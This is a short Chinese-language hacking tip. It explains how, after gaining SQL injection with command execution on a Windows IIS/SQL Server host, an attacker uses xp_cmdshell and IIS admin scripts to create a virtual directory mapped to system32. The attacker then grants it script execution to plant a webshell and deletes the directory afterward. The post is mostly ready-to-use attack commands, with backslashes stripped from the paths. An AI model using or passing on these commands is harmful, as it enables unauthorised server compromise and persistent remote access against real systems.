SQL注入建立虚拟目录,找Web绝对路径!
摘要:我们很多情况下都遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错:exec...
我们很多情况下都遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错:
execmaster.dbo.xp_cmdshell'cscriptC:InterpubAdminScriptsmkwebdir.vbs-clocalhost-w"l"-v"win","c:winntsystem32"'
建立虚拟目录win,指向c:winntsystem32
execmaster.dbo.xp_cmdshell'cscriptC:InterpubAdminScriptsadsutil.vbsw3svc/1/root/win/AccessexecuteTure'
让win句有解析asp脚本权限
execmaster.dbo.xp_cmdshell"cscriptC:InterpubAdminScriptsadsutil.vbsdeletew3svc/1/root/h4x0r/"
删除虚拟目录。
找不到web绝对路径的一种解决办法,
http://21o.net/h4x0r
403错误,表示虚拟目录建好了。。。
【SQL注入建立虚拟目录,找Web绝对路径!】相关文章:
★ 典型入侵日志分析